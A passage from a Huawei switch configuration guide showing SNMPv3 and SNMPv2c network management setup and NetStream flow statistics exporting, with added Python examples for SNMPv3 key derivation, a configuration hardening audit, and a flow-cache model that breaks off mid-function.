Figure 18-3 Configuring a device to communicate with the NMS using SNMPv3 (NMS at 10.1.1.1/24, connected over an IP network to GE1/0/1 of the Switch in VLAN10, 10.1.10.2/24)


Configuration Roadmap
The configuration roadmap is as follows:
1. Configure SNMPv3 on the switch so that the NMS running SNMPv3 can manage the
switch.
2. Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
3. Configure a user group and user based on which the switch permits access of the NMS.
4. Configure a trap host and enable the switch to automatically send traps to the NMS.
5. Add the switch to the NMS. The user group and user configured on the switch must be
the same as those used by the NMS; otherwise, the NMS cannot manage the switch.

Procedure
Step 1 Configure SNMPv3 on the switch so that the NMS running SNMPv3 can manage the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] snmp-agent sys-info version v3 //By default, SNMPv3 is supported. If SNMPv3 is not disabled, skip this command.

Step 2 Configure access control so that only the NMS with the specified IP address can perform
read/write operations on the specified MIB objects of the switch.
# Configure an ACL to permit only the NMS 10.1.1.1 to access the switch.
[Switch] acl 2001
[Switch-acl-basic-2001] rule permit source 10.1.1.1 0 //Allow only the NMS with IP address 10.1.1.1 to access the device.
[Switch-acl-basic-2001] rule deny
[Switch-acl-basic-2001] quit

# Configure the MIB view to specify the MIB objects that can be accessed by the NMS.
[Switch] snmp-agent mib-view included isoview iso //Specify that the accessible MIB view contains iso.

Step 3 Configure a user group and user based on which the switch permits access of the NMS.
# Configure the user group group001, set the security level to privacy, and configure access
control to restrict the access of NMS to the switch.
[Switch] snmp-agent group v3 group001 privacy write-view isoview acl 2001 //Configure a user group and apply an ACL to make the access control function take effect.

# Configure the user user001.


[Switch] snmp-agent usm-user v3 user001 group group001 //Configure a user name and add the user name to the specified user group.

# Set the authentication password to Authe@1234.


[Switch] snmp-agent usm-user v3 user001 authentication-mode sha //Set an authentication mode to improve security of the managed switch running SNMPv3.
Please configure the authentication password (8-64)
Enter Password: //Enter the authentication password. It is Authe@1234 in this example.
Confirm Password: //Confirm the password. It is Authe@1234 in this example.

# Set the encryption password to Priva@1234.
[Switch] snmp-agent usm-user v3 user001 privacy-mode aes256 //Set an encryption mode to improve security of the managed switch running SNMPv3.
Please configure the privacy password (8-64)
Enter Password: //Enter the encryption password. It is Priva@1234 in this example.
Confirm Password: //Confirm the password. It is Priva@1234 in this example.
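What the switch does with the authentication password entered for user001 above, as an added Python example (not Huawei code): the RFC 3414 password-to-key expansion and localization with the agent's engine ID, which is why the same password yields a different key on every device. It uses the local-engineid from this section's configuration file, the RFC 3414 "maplesyrup" test vector for checking, and an HMAC-SHA-96 tag function to show how the localized key authenticates a message.

```python
"""SNMPv3 USM key derivation (RFC 3414, Appendix A.2).

Added example, not Huawei code. The password typed in Step 3 is first
expanded and hashed into an intermediate key Ku, then Ku is localized
with the agent's snmpEngineID, so the same password gives a different
key on every managed device. ENGINE_ID is the local-engineid from this
section's configuration file; the 'maplesyrup' values used in the checks
are the RFC 3414 A.3.2 test vector.
"""
import hashlib
import hmac

ONE_MEGABYTE = 1048576
# local-engineid as shown in the configuration file of this example
ENGINE_ID = bytes.fromhex("800007DB03360102101100")


def password_to_ku(password: bytes, hash_name: str = "sha1") -> bytes:
    """Ku = H(password repeated cyclically to exactly 1,048,576 bytes)."""
    if not password:
        raise ValueError("empty password")
    repeats = ONE_MEGABYTE // len(password) + 1
    expanded = (password * repeats)[:ONE_MEGABYTE]
    return hashlib.new(hash_name, expanded).digest()


def localize(ku: bytes, engine_id: bytes, hash_name: str = "sha1") -> bytes:
    """Kul = H(Ku || snmpEngineID || Ku), the key actually used by the agent."""
    return hashlib.new(hash_name, ku + engine_id + ku).digest()


def usm_auth_key(password: str, engine_id: bytes, hash_name: str = "sha1") -> bytes:
    """Localized authentication key for one USM user on one agent."""
    ku = password_to_ku(password.encode("utf-8"), hash_name)
    return localize(ku, engine_id, hash_name)


def auth_tag(kul: bytes, whole_msg: bytes) -> bytes:
    """HMAC-SHA-96 (RFC 3414 section 6.3): the 12-byte value carried in
    msgAuthenticationParameters, computed over the message with that field
    zeroed; a receiver recomputes it with its own localized key."""
    return hmac.new(kul, whole_msg, "sha1").digest()[:12]


if __name__ == "__main__":
    # Authe@1234 is the authentication password from Step 3 of this example.
    key = usm_auth_key("Authe@1234", ENGINE_ID)
    print("localized SHA auth key for user001:", key.hex())
    # constructed stand-in for a serialized SNMPv3 message
    print("HMAC-SHA-96 tag:", auth_tag(key, b"constructed SNMPv3 message").hex())
```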

Step 4 Configure a trap host and enable the switch to automatically send traps to the NMS.
[Switch] snmp-agent trap enable
Warning: All switches of SNMP trap/notification will be open. Continue? [Y/N]:y //Enable all trap functions on the switch. By default, only some trap functions are enabled. You can run the display snmp-agent trap all command to check trap status.
[Switch] snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname user001 v3 privacy //Configure a trap host. By default, traps are sent by UDP port 162. The security name must be the same as the user name; otherwise, the NMS cannot manage the device.

Step 5 Add the switch to the NMS.

Configure the SNMP function on the NMS according to the NMS manual, including setting
the SNMP version to SNMPv3, configuring the user group group001 and user user001,
setting the authentication mode to SHA and authentication password to Authe@1234, setting
the encryption mode to AES256 and encryption password to Priva@1234, and setting the
SNMP connection port to port 161 (default port used by the switch). In addition, set the trap
receiving port to port 162 (default port used by the switch) so that the NMS can receive traps.

After the configurations are complete, the NMS can manage the switch and the switch can
automatically send traps to the NMS when events occur.

NOTE

The parameter settings on the NMS must be the same as those on the switch; otherwise, the NMS cannot
manage the switch.

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
acl number 2001
rule 5 permit source 10.1.1.1 0
rule 10 deny
#
snmp-agent
snmp-agent local-engineid 800007DB03360102101100
snmp-agent sys-info version v3
snmp-agent group v3 group001 privacy write-view isoview acl 2001
snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname
user001 v3 privacy
snmp-agent mib-view included isoview iso
snmp-agent usm-user v3 user001
snmp-agent usm-user v3 user001 group group001
snmp-agent usm-user v3 user001 authentication-mode sha cipher %^%#*2C%=4LZn1L>ni9xaybHdbXFW&[c_Wv0m!0MpTj!%^%#
snmp-agent usm-user v3 user001 privacy-mode aes256 cipher %^%#i\Fv-cC(u)+x26S2'rEX<.;V+e~nP)*.J$Ulr($/%^%#
snmp-agent trap enable
#
return
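The following script is added here as an example and is not part of Huawei's documentation. It audits a VRP-style configuration like the file above for the SNMPv3 settings this example relies on: v3 only, a privacy-level group bound to an ACL, SHA authentication, AES privacy, and a trap host whose security name is a configured user that the group's ACL permits. Both sample configurations and the cipher placeholders are constructed, and the parser understands only the command forms shown on this page.

```python
import ipaddress
import re

# Constructed sample mirroring the switch configuration file of this example (key material replaced).
SECURE_CONFIG = """\
acl number 2001
 rule 5 permit source 10.1.1.1 0
 rule 10 deny
#
snmp-agent sys-info version v3
snmp-agent group v3 group001 privacy write-view isoview acl 2001
snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname user001 v3 privacy
snmp-agent usm-user v3 user001 group group001
snmp-agent usm-user v3 user001 authentication-mode sha cipher %^%#PLACEHOLDER%^%#
snmp-agent usm-user v3 user001 privacy-mode aes256 cipher %^%#PLACEHOLDER%^%#
snmp-agent trap enable
"""

# Constructed sample of the same switch with several hardening points missed.
WEAK_CONFIG = """\
snmp-agent sys-info version v2c v3
snmp-agent group v3 group001 authentication write-view isoview
snmp-agent target-host trap address udp-domain 10.1.1.1 params securityname user002 v3 privacy
snmp-agent usm-user v3 user001 group group001
snmp-agent usm-user v3 user001 authentication-mode md5 cipher %^%#PLACEHOLDER%^%#
snmp-agent trap enable
"""

RULE_RE = re.compile(r"rule \d+ (permit|deny)(?: source (\S+) (\S+))?")
GROUP_RE = re.compile(r"snmp-agent group v3 (\S+) (noauthentication|authentication|privacy)(.*)")
USER_RE = re.compile(r"snmp-agent usm-user v3 (\S+)(?: (group|authentication-mode|privacy-mode) (\S+))?")
TRAP_RE = re.compile(r"snmp-agent target-host trap address udp-domain (\S+) params securityname (\S+) v3 (\S+)")


def parse(config):
    """Collect the SNMP and ACL facts the audit needs; other commands are ignored."""
    facts = {"versions": set(), "groups": {}, "users": {}, "traps": [], "acls": {}}
    acl = None  # rule list of the ACL currently being defined
    for raw in config.splitlines():
        line = raw.strip()
        if m := re.match(r"acl number (\d+)", line):
            acl = facts["acls"].setdefault(m.group(1), [])
        elif (m := RULE_RE.match(line)) and acl is not None:
            acl.append((m.group(1), m.group(2), m.group(3)))
        elif not line.startswith("snmp-agent"):
            acl = None  # "#" or any other section ends the ACL
        elif line.startswith("snmp-agent sys-info version"):
            facts["versions"].update(line.split()[3:])
        elif m := GROUP_RE.match(line):
            ref = re.search(r"\bacl (\d+)", m.group(3))
            facts["groups"][m.group(1)] = {"level": m.group(2), "acl": ref.group(1) if ref else None}
        elif m := USER_RE.match(line):
            user = facts["users"].setdefault(m.group(1), {})
            if m.group(2):
                user[m.group(2)] = m.group(3)
        elif m := TRAP_RE.match(line):
            facts["traps"].append({"host": m.group(1), "secname": m.group(2), "level": m.group(3)})
    return facts


def acl_permits(rules, address):
    """First-match evaluation of a VRP basic ACL; a set wildcard bit means "don't care".
    Assumption: no matching rule means not permitted (the page's ACL ends with an explicit deny)."""
    addr = int(ipaddress.ip_address(address))
    for action, source, wildcard in rules:
        if source is None:  # a rule without a source matches everything
            return action == "permit"
        # VRP accepts a bare 0 as the all-zero (exact host) wildcard
        wild = int(ipaddress.ip_address(wildcard)) if "." in wildcard else int(wildcard)
        care = ~wild & 0xFFFFFFFF
        if addr & care == int(ipaddress.ip_address(source)) & care:
            return action == "permit"
    return False


def audit(config):
    """Return the list of findings; an empty list means every check passed."""
    f = parse(config)
    findings = []
    legacy = f["versions"] & {"v1", "v2c", "all"}
    if legacy:
        findings.append("legacy SNMP versions enabled: " + ", ".join(sorted(legacy)))
    for name, g in f["groups"].items():
        if g["level"] != "privacy":
            findings.append(f"group {name}: security level {g['level']}, SNMP traffic is not encrypted")
        if g["acl"] is None:
            findings.append(f"group {name}: no ACL limits which NMS may use it")
    for name, u in f["users"].items():
        if u.get("authentication-mode") in (None, "md5"):
            findings.append(f"user {name}: missing or weak authentication mode")
        if u.get("privacy-mode") in (None, "des56"):
            findings.append(f"user {name}: missing or weak privacy mode")
    for t in f["traps"]:
        user = f["users"].get(t["secname"])
        if user is None:
            findings.append(f"trap host {t['host']}: security name {t['secname']} is not a configured user")
            continue
        group = f["groups"].get(user.get("group"))
        if group and group["acl"] in f["acls"] and not acl_permits(f["acls"][group["acl"]], t["host"]):
            findings.append(f"trap host {t['host']}: denied by ACL {group['acl']} of its own group")
    return findings
```

Run `audit()` over the output of display current-configuration (or a saved configuration file) to get the same findings for a real device.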


18.1.4 Example for Configuring eSight and Switches to Communicate Through SNMPv2c
Introduction to eSight
eSight is a new-generation comprehensive operation, maintenance, and management solution
developed by Huawei for network infrastructure management, unified communications,
telepresence conferencing, video surveillance, and data center in enterprises. eSight supports
unified monitoring and configuration management over devices of various types and from
various vendors, monitors and analyzes network and service quality, manages enterprise
resources, services, and users in a unified manner, and analyzes association between them. In
addition, eSight offers a flexible and open platform that enables enterprises to customize
software and build an intelligent management system tailored to their own needs. This
example describes how a network administrator uses the Simple Network Management
Protocol Version 2c (SNMPv2c) to automatically discover network devices on eSight.

Configuration Notes
This example uses eSight V200R005C00 and switch V200R003C00. The configurations may
vary with software versions. For details, see the product manual of the corresponding version.

Networking Requirements
An enterprise administrator wants to use eSight to manage devices of the enterprise.
l The enterprise has recently replanned its network, and the number of devices on the entire
network has increased to about 1000. Logging in to each device to configure and manage it
is labor-intensive, so the administrator needs a network management system (NMS) to
manage all the devices on the network uniformly.
l Devices on the enterprise network belong to the R&D Dept and the finance Dept, and
devices in the R&D Dept are divided into two service groups. The R&D Dept has 800
devices and the finance Dept has 200 devices. The administrator wants to manage the
devices by group, view the device status of each department, and batch configure
services for devices in the same service group during maintenance.


Figure 18-4 Networking of automatic device discovery (eSight manages three areas: R&D Dept A, R&D Dept B, and the Finance Dept)

Requirement Analysis
l Enabling automatic device discovery: A large number of security devices and network
devices need to be deployed on the network. The automatic device discovery function
provided by eSight reduces the administrator's workload, improves operation
efficiency, and reduces misoperations.
l Selecting the SNMPv2c protocol: A majority of the security devices and network devices
use SNMPv2c. SNMPv2c has higher security than SNMPv1, and is simpler and easier to
configure than SNMPv3.
l Enabling the subnet function in topology monitoring: The subnet function in topology
monitoring enables eSight to monitor devices by area according to the subnet on which
the devices are located. The administrator can divide the enterprise network into multiple
subnets by department to implement differentiated management.
l Enabling the grouping function: During routine maintenance, the administrator needs to
batch configure devices that provide similar services. The grouping function enables
eSight to automatically add devices to different groups after grouping rules are set. The
administrator can then batch perform authentication and alarm filtering operations for
devices in the same group.


Data Plan

Item: SNMP parameters
Value:
  Template name: SNMP_v2c
  SNMP version: v2c
  Read community: Public123
  Write community: Private123
  NE port: 161
  Timeout interval(s): 3
  Resending times: 3
Description: It is recommended that the read and write community names have high complexity and meet the complexity requirements on devices to ensure security. The highest complexity is recommended because different devices have different complexity requirements, for example, a combination of upper-case letters, lower-case letters, and digits.

Item: IP address
Value: IP addresses in different network segments are allocated based on the service group.
  l R&D Dept A
    – Service group 1: 192.168.11.0-192.168.11.255
    – Service group 2: 192.168.12.0-192.168.12.255
  l R&D Dept B
    – Service group 3: 192.168.31.0-192.168.31.255
    – Service group 4: 192.168.32.0-192.168.32.255
  l Finance Dept: 192.168.51.0-192.168.51.255
Description: IP addresses are allocated based on the service group and department. Devices in a service group can only use IP addresses in a specified network segment, so that subnets can be divided and devices can be grouped based on IP addresses.

Item: Subnet
Value: The network is divided into three subnets and assigned subnet IP address ranges.
  l subnet_rda (R&D Dept A): 192.168.11.0-192.168.12.255
  l subnet_rdb (R&D Dept B): 192.168.31.0-192.168.32.255
  l subnet_finance (Finance Dept): 192.168.51.0-192.168.51.255
Description: One subnet on eSight can contain up to 500 devices. It is recommended that the R&D Dept with 800 devices be divided into two subnets, and the finance Dept into one subnet.

Item: Grouping rule
Value: Five groups are divided based on the service type and department.
  l group_rda1 (R&D Dept A, service group 1): 192.168.11.0-192.168.11.255
  l group_rda2 (R&D Dept A, service group 2): 192.168.12.0-192.168.12.255
  l group_rdb3 (R&D Dept B, service group 1): 192.168.31.0-192.168.31.255
  l group_rdb4 (R&D Dept B, service group 2): 192.168.32.0-192.168.32.255
  l group_finance (Finance Dept): 192.168.51.0-192.168.51.255
Description: The start and end IP addresses are specified in grouping rules. After eSight discovers the devices, they are automatically added to different groups.

Configuration Roadmap
1. Configure SNMP parameters on the devices.
2. Create subnets on eSight.
3. Set grouping rules on eSight.
4. Create an SNMP template on eSight.
5. Enable eSight to discover devices using SNMP.

Prerequisites
IP addresses have been configured for devices on the network according to Data Plan, and
the devices can successfully communicate with eSight.

Procedure
Step 1 Configure SNMP parameters on the devices.
<SwitchA> system-view
[SwitchA] snmp-agent //Start the SNMP agent service.
[SwitchA] snmp-agent sys-info version v2c //Set the SNMP version to v2c.
[SwitchA] snmp-agent mib-view included View_ALL iso //Create a MIB view View_ALL.
[SwitchA] snmp-agent community read cipher Public123 mib-view View_ALL //Configure a read community name and set the rights of the MIB view.
[SwitchA] snmp-agent community write cipher Private123 mib-view View_ALL //Configure a write community name and set the rights of the MIB view.
[SwitchA] snmp-agent trap source MEth0/0/1 //Specify the source interface for sending traps. Here, a management interface is specified as the source interface.
[SwitchA] snmp-agent trap enable //Enable the trap function to report alarms.
[SwitchA] snmp-agent target-host trap address udp-domain 192.168.10.10 params securityname Public123 v2c //Set the eSight IP address to 192.168.10.10, securityname to Public123, and version to v2c.


Step 2 Create subnets.
1. Choose Resource > Resource Management > Equipment Resources from the main menu.
2. In the navigation tree, choose Logical Resources > Subnet.
3. On the Subnet page, click .
4. In the dialog box that is displayed, enter the subnet name and description, and click OK.
Repeat the steps to create the other two subnets.

Step 3 Set grouping rules.
1. Choose Resource > Resource Management > Group Management from the main menu.
2. In the navigation tree, choose Device Group and click next to User Defined Groups.
3. In the Basic Information dialog box, set the group name and description.
4. Click under Dynamic Rules to set grouping rules.
a. Set the rule name to rule_01.
b. Select satisfy all conditions.
c. Set the dynamic rule to IP address startwith 192.168.11.0.


d. Click next to the dynamic rule. A line is displayed under the dynamic rule. Set
the other dynamic rule to IP address endwith 192.168.11.255.

5. Click Confirm. The first grouping rule is set. Repeat the steps to set other grouping rules
according to Data Plan.
Step 4 Create an SNMP template on eSight.
1. Choose Resource > Resource Management > Protocol Template from the main menu.

2. In the navigation tree, choose SNMP Template and click .


3. Set parameters in the SNMP template according to Data Plan and click OK.


Step 5 Use the automatic device discovery function to add devices to eSight.
1. Choose Resource > Add Device > Automatic from the main menu.

2. Set Select discovery protocol to SNMP and Select discovery mode to Immediate
discovery.
3. Specify start and end IP addresses of network segments and add them to subnets.

Click Add Another Network Segment, specify start and end IP addresses of the
network segment and add it to the corresponding subnet.

4. Select Select template and select the template SNMP_v2c created in the preceding step
from the template list.
5. Select Auto add to NMS and click Start Discovery.
6. After automatic device discovery is complete, check whether all the devices matching
parameters in the template are added to eSight. Click Complete.


Step 6 Adjust the topology layout.
1. Choose Monitor > Topology > Topology Management from the main menu.
2. On the Physical topology page, adjust the device locations.
3. Click to save the new locations of the devices in the topology.

----End

Verification
1. Check devices on subnets.
a. Choose Monitor > Topology > Topology Management from the main menu.

b. Double-click the icon of subnet_finance in the topology to display the subnet
topology. Check whether all the devices in the finance Dept are added to the subnet.
If so, the operations are correct. Perform similar steps to check the other two
subnets. If devices are not added to the corresponding subnet, check the IP address
segments of the subnets.
2. Check grouping of devices.
a. Choose Resource > Resource Management > Group Management from the main
menu.

b. Choose Device Group > User Defined Groups > group_rda1. Check whether all
the devices in the service group 1 of R&D Dept A are added to the group. If so, the
operations are correct. Perform similar steps to check the other four groups. If
devices are not added to the corresponding group, check whether the devices are
added to eSight and whether grouping rules are correctly set.

18.2 Typical NetStream Configuration

18.2.1 Example for Configuring Original Flow Statistics Exporting


NetStream Overview
NetStream is a technology that collects statistics on and analyzes service traffic on networks.
NetStream facilitates accounting and network monitoring.
It has the following advantages:
l NetStream collects statistics on multiple types of information in packets. It provides a
powerful statistics collection function and detailed statistical results.
l NetStream can be deployed at a low cost. No dedicated device is required to collect
traffic information and no device interface is occupied.
Original flow statistics are exported when the flow aging time expires. Statistics on every
flow are exported to the NetStream server, so the NetStream server obtains detailed statistics
on every flow.

Configuration Notes
NetStream is supported by E series (except ET1D2X48SEC0), and X1E cards.
NetStream conflicts with IP Source Trail on modular switches, so do not configure them
simultaneously.

Table 18-1 Applicable product models and versions

Product Model       Software Version
S12704              V200R008C00, V200R009C00
S12708 and S12712   V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00

Networking Requirements
As shown in Figure 18-5, Department 1 and Department 2 connect to the Internet through
SwitchA. Network administrators want to monitor communication between the two
departments and the Internet, and perform accounting for each department.


Figure 18-5 Networking diagram for configuring original flow statistics exporting: SwitchA connects to the Internet through GE1/0/1 (VLANIF100, 10.1.1.1/24) and to the NetStream server (10.1.2.2/24) through GE1/0/2 (VLANIF200, 10.1.2.1/24); GE1/0/3 (VLANIF300, 10.1.3.1/24) and GE1/0/4 (VLANIF400, 10.1.4.1/24) connect Department 1 and Department 2.

Configuration Roadmap
You can configure IPv4 original flow statistics exporting on GE1/0/1 of SwitchA. Configure
SwitchA to collect statistics on incoming and outgoing traffic on the interface, and to send the
statistics to the NetStream server for further analysis. In this way, you can monitor
communication between the two departments and the Internet, and perform accounting for
each department.
The configuration roadmap is as follows:
1. Configure IP addresses for interfaces on SwitchA.
2. Configure NetStream sampling.
3. Configure NetStream flow aging.
4. Configure original flow statistics exporting.
5. Configure the version of exported packets.
6. Enable NetStream flow statistics collection on GE1/0/1.

Procedure
Step 1 Configure IP addresses for interfaces on SwitchA according to Figure 18-5.
# Configure IP addresses for interfaces on SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 200 300 400
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 10.1.1.1 24
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 200
[SwitchA-Vlanif200] ip address 10.1.2.1 24
[SwitchA-Vlanif200] quit
[SwitchA] interface vlanif 300


[SwitchA-Vlanif300] ip address 10.1.3.1 24
[SwitchA-Vlanif300] quit
[SwitchA] interface vlanif 400
[SwitchA-Vlanif400] ip address 10.1.4.1 24
[SwitchA-Vlanif400] quit
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid pvid vlan 100
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 100
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type hybrid
[SwitchA-GigabitEthernet1/0/2] port hybrid pvid vlan 200
[SwitchA-GigabitEthernet1/0/2] port hybrid untagged vlan 200
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type hybrid
[SwitchA-GigabitEthernet1/0/3] port hybrid pvid vlan 300
[SwitchA-GigabitEthernet1/0/3] port hybrid untagged vlan 300
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] port link-type hybrid
[SwitchA-GigabitEthernet1/0/4] port hybrid pvid vlan 400
[SwitchA-GigabitEthernet1/0/4] port hybrid untagged vlan 400
[SwitchA-GigabitEthernet1/0/4] quit

Step 2 Configure NetStream sampling.

# Configure fixed-packet NetStream sampling on GE1/0/1 in both directions and set the sampling ratio to 1200.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] ip netstream sampler fix-packets 1200 inbound
[SwitchA-GigabitEthernet1/0/1] ip netstream sampler fix-packets 1200 outbound
[SwitchA-GigabitEthernet1/0/1] quit

Step 3 Configure NetStream flow aging.

# Set the inactive aging time to 100 seconds and enable FIN- and RST-based aging.
[SwitchA] ip netstream timeout inactive 100
[SwitchA] ip netstream tcp-flag enable

Step 4 Configure NetStream original flow statistics exporting.

# Set the source IP address of the exported packets carrying original flow statistics to
10.1.2.1, destination IP address to 10.1.2.2, and destination port number to 6000.
[SwitchA] ip netstream export source 10.1.2.1
[SwitchA] ip netstream export host 10.1.2.2 6000

Step 5 Configure the version of exported packets.

# Set the version of exported packets to V9.
[SwitchA] ip netstream export version 9

Step 6 Enable NetStream flow statistics collection on GE1/0/1.

# Enable NetStream flow statistics collection on GE1/0/1.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] ip netstream inbound
[SwitchA-GigabitEthernet1/0/1] ip netstream outbound
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] quit

Step 7 Verify the configuration.


# After the configuration is complete, the NetStream server can receive statistics packets from
SwitchA. Run the display ip netstream statistics command on SwitchA to view NetStream
flow statistics.
<SwitchA> display ip netstream statistics slot 1
===== Netstream statistics: =====
Origin/Flexible ingress entries : 35
Origin/Flexible ingress packets : 381920
Origin/Flexible ingress octets : 125269760
Origin/Flexible egress entries : 0
Origin/Flexible egress packets : 0
Origin/Flexible egress octets : 0
Origin/Flexible total entries : 35
Handle origin entries : 35
Handle As aggre entries : 0
Handle ProtPort aggre entries : 0
Handle SrcPrefix aggre entries : 0
Handle DstPrefix aggre entries : 0
Handle Prefix aggre entries : 0
Handle AsTos aggre entries : 0
Handle ProtPortTos aggre entries : 0
Handle SrcPreTos aggre entries : 0
Handle DstPreTos aggre entries : 0
Handle PreTos aggre entries : 0

----End

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100 200 300 400
#
ip netstream timeout inactive 100
ip netstream export version 9
ip netstream export source 10.1.2.1
ip netstream export host 10.1.2.2 6000
#
ip netstream tcp-flag enable
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif200
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif300
ip address 10.1.3.1 255.255.255.0
#
interface Vlanif400
ip address 10.1.4.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
ip netstream inbound
ip netstream outbound
ip netstream sampler fix-packets 1200 inbound
ip netstream sampler fix-packets 1200 outbound
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200


#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid pvid vlan 300
port hybrid untagged vlan 300
#
interface GigabitEthernet1/0/4
port link-type hybrid
port hybrid pvid vlan 400
port hybrid untagged vlan 400
#
return

18.2.2 Example for Configuring Aggregation Flow Statistics Exporting

NetStream Overview
NetStream is a technology that collects statistics on and analyzes service traffic on networks.
NetStream facilitates accounting and network monitoring.

It has the following advantages:

l NetStream collects statistics on multiple types of information in packets. It provides a
powerful statistics collection function and detailed statistical results.
l NetStream can be deployed at a low cost. No dedicated device is required to collect
traffic information and no device interface is occupied.

In aggregation flow statistics exporting, the device summarizes the flows that share the same
aggregation keywords and obtains statistics on the resulting aggregation flow. Exporting
aggregation flow statistics therefore occupies noticeably less bandwidth than exporting
original flow statistics.

Configuration Notes
NetStream is supported by E series (except ET1D2X48SEC0), and X1E cards.

NetStream conflicts with IP Source Trail on modular switches, so do not configure them
simultaneously.

Table 18-2 Applicable product models and versions

Product Model       Software Version
S12704              V200R008C00, V200R009C00
S12708 and S12712   V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00

Networking Requirements
As shown in Figure 18-6, Department 1 and Department 2 connect to the Internet through
SwitchA. Network administrators want to monitor communication between the two
departments and the Internet.


Figure 18-6 Networking diagram for configuring aggregation flow statistics exporting: SwitchA connects to the Internet through GE1/0/1 (VLANIF100, 10.1.1.1/24) and to the NetStream server (10.1.2.2/24) through GE1/0/2 (VLANIF200, 10.1.2.1/24); GE1/0/3 (VLANIF300, 10.1.3.1/24) and GE1/0/4 (VLANIF400, 10.1.4.1/24) connect Department 1 and Department 2.

Configuration Roadmap
You can configure IPv4 aggregation flow statistics exporting on GE1/0/1 of SwitchA.
Configure SwitchA to collect statistics on incoming and outgoing traffic on the interface, and
to send the statistics to the NetStream server for further analysis. In this way, you can monitor
communication between the two departments and the Internet.
The configuration roadmap is as follows:
1. Configure IP addresses for interfaces on SwitchA.
2. Configure NetStream aggregation flow statistics exporting.
3. Configure the version of exported packets.
4. Enable NetStream flow statistics collection on GE1/0/1.

Procedure
Step 1 Configure IP addresses for interfaces on SwitchA according to Figure 18-6.
# Configure IP addresses for interfaces on SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 200 300 400
[SwitchA] interface vlanif 100
[SwitchA-Vlanif100] ip address 10.1.1.1 24
[SwitchA-Vlanif100] quit
[SwitchA] interface vlanif 200
[SwitchA-Vlanif200] ip address 10.1.2.1 24
[SwitchA-Vlanif200] quit
[SwitchA] interface vlanif 300
[SwitchA-Vlanif300] ip address 10.1.3.1 24
[SwitchA-Vlanif300] quit
[SwitchA] interface vlanif 400
[SwitchA-Vlanif400] ip address 10.1.4.1 24
[SwitchA-Vlanif400] quit


[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type hybrid
[SwitchA-GigabitEthernet1/0/1] port hybrid pvid vlan 100
[SwitchA-GigabitEthernet1/0/1] port hybrid untagged vlan 100
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type hybrid
[SwitchA-GigabitEthernet1/0/2] port hybrid pvid vlan 200
[SwitchA-GigabitEthernet1/0/2] port hybrid untagged vlan 200
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type hybrid
[SwitchA-GigabitEthernet1/0/3] port hybrid pvid vlan 300
[SwitchA-GigabitEthernet1/0/3] port hybrid untagged vlan 300
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] port link-type hybrid
[SwitchA-GigabitEthernet1/0/4] port hybrid pvid vlan 400
[SwitchA-GigabitEthernet1/0/4] port hybrid untagged vlan 400
[SwitchA-GigabitEthernet1/0/4] quit

Step 2 Configure NetStream aggregation flow statistics exporting.

# Configure the aggregation keyword protocol-port, and set the source IP address of the
exported packets to 10.1.2.1, destination IP address to 10.1.2.2, and destination port number
to 6000.
[SwitchA] ip netstream aggregation protocol-port
[SwitchA-aggregation-protport] ip netstream export source 10.1.2.1
[SwitchA-aggregation-protport] ip netstream export host 10.1.2.2 6000
[SwitchA-aggregation-protport] enable
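To make the aging and aggregation behaviour concrete, the following Python model is added here as an example and is not Huawei code. It builds a flow cache keyed on the original 5-tuple, ages flows by the 100-second inactive timeout and by TCP FIN/RST as configured in 18.2.1, and then summarises the exported records with the protocol-port aggregation keyword used in this step. The traffic is constructed, packet sampling and the V9 export encoding are not modelled, and the keyword is assumed to consist of the protocol number, source port and destination port.

```python
from collections import namedtuple

Packet = namedtuple("Packet", "time src sport dst dport proto octets tcp_flags")
TCP, UDP = 6, 17
SYN, ACK, FIN, RST = 0x02, 0x10, 0x01, 0x04


class FlowCache:
    """Original-flow cache: one entry per 5-tuple, aged like SwitchA in 18.2.1."""

    def __init__(self, inactive_timeout=100, tcp_flag_aging=True):
        self.inactive_timeout = inactive_timeout  # ip netstream timeout inactive 100
        self.tcp_flag_aging = tcp_flag_aging      # ip netstream tcp-flag enable
        self.flows = {}

    def age(self, now):
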